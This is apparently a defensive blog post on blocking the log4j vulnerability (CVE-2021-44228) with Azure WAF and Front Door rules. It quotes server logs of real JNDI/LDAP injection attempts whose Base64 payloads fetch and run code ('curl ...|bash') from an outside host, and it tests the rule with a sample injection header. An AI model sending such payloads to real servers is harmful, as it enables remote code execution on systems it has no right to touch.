How to take countermeasures against log4j vulnerability (CVE-2021–44228) on Azure WAF.

Introduction

This is one of the countermeasures for the log4j vulnerability (CVE-2021–44228) in Azure.
I think it’s a good idea to update the software, but it’s just a temporary measure.
You can set up a managed rule in Azure WAF to counter the vulnerability.

I will not describe how to use services such as Azure WAF here.
Please understand that I am not a security expert.

This is what was left in the server logs this time.
Some IPs have been modified.
In Base64, it is curl {IP}|bash. In other words, it is trying to execute a command.

45.153.xxx.xxx - - [10/Dec/2021:21:03:35 +0900] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://9f07e758d269.bingsearxxxxxx.com:39356/a}"
45.155.xxx.xxx - - [10/Dec/2021:22:00:41 +0900] "GET / HTTP/1.1" 301 531 "-" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo4MCl8YmFzaA==}"
45.155.xxx.xxx - - [10/Dec/2021:23:40:59 +0900] "GET / HTTP/1.1" 301 5368 "-" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzguMjguMTY6NDQzKXxiYXNo}"
45.155.xxx.xxx - - [10/Dec/2021:23:41:02 +0900] "GET / HTTP/1.1" 200 35233 "https://13.78.xxx.xxx:443/" "${jndi:ldap://45.155.xxx.xxx3:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzguMjguMTY6NDQzKXxiYXNo}"
45.155.xxx.xxx - - [11/Dec/2021:03:12:42 +0900] "GET / HTTP/1.1" 301 531 "-" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo4MCl8YmFzaA==}"
45.155.xxx.xxx - - [11/Dec/2021:04:20:42 +0900] "GET / HTTP/1.1" 301 5368 "-" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzguMjguMTY6NDQzKXxiYXNo}"
45.155.xxx.xxx - - [11/Dec/2021:04:20:46 +0900] "GET / HTTP/1.1" 200 35240 "https://13.78.xxx.xxx:443/" "${jndi:ldap://45.155.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgAASFoyaSsSO1LjIwNS4yMzM6NTg3NC8xMy43OC4yOC4xNjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzguMjguMTY6NDQzKXxiYXNo}"

[Update 12/15/2021]

Front Door can handle it with default rules.
944240 “Remote Command Execution”

# curl -ks -I https://fdlog4j.azurefd.net  -H 'User-Agent: ${jndi:ldap://TESTURL}'
HTTP/2 403
x-azure-ref: 0tW25YQAAAACD1AdpuBODQYOGiLvMlvurVFlPMDFFREdFMjMwOQBjNmUzMjgyMy02OGQxLTRjYzUtYmQ5My00NmYxODM5Y2JhZDE=
date: Wed, 15 Dec 2021 04:23:17 GMT

[Update 12/16/2021]

It seems that the managed rules of Application Gateway are now supported in the East Japan region.
Therefore, you do not need to set the following custom rules.
Custom rules should be set when you want to take more detailed measures individually.

# curl -ks -I https://20.1xx.xxx.41 -H 'User-Agent: ${jndi:ldap://TESTURL}'
HTTP/1.1 403 Forbidden
Server: Microsoft-Azure-Application-Gateway/v2
Date: Wed, 15 Dec 2021 16:40:54 GMT
Content-Type: text/html
Content-Length: 179
Connection: keep-alive

Custom rule creation

For this attack, the string jndi:ldap is present in the User-Agent, which prevents it from being detected.
However, we may need to add more rules depending on the information that comes out in the future.

Custom Rule Name: Any name
Priority: Any priority

Match type: String
Match Variables:RequestHeaders
Header Name:User-Agent
Operation: is
Operator: Contains
Match Values:jndi:ldap

Apply the above rules.

In this case, we have enabled WAF for the Application Gateway and used the server of this blog as the backend.

Check

Prevention mode


# curl -ks -I https://level69.net -H 'User-Agent: ${jndi:ldap://TESTURL}'
HTTP/1.1 403 Forbidden
Server: Microsoft-Azure-Application-Gateway/v2
Date: Sat, 11 Dec 2021 07:55:13 GMT
Content-Type: text/html
Content-Length: 179
Connection: keep-alive

Detection mode

# curl -ks -I https://level69.net  -H 'User-Agent: ${jndi:ldap://TESTURL}'
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2021 07:56:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding

In preventive mode, you can see that the Application Gateway is rejecting it.

Conclusion

For the log4j vulnerability (CVE-2021–44228), we recommend updating the software.
However, if you want to take temporary measures in your existing environment, WAF is also effective.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jun Kudo

Jun Kudo

I’m Japanese, Microsoft MVP for Azure. Alibaba Cloud MVP. Cloud Solution Architect. Azure, AWS, GCP, and Alibaba Cloud. https://twitter.com/jkudo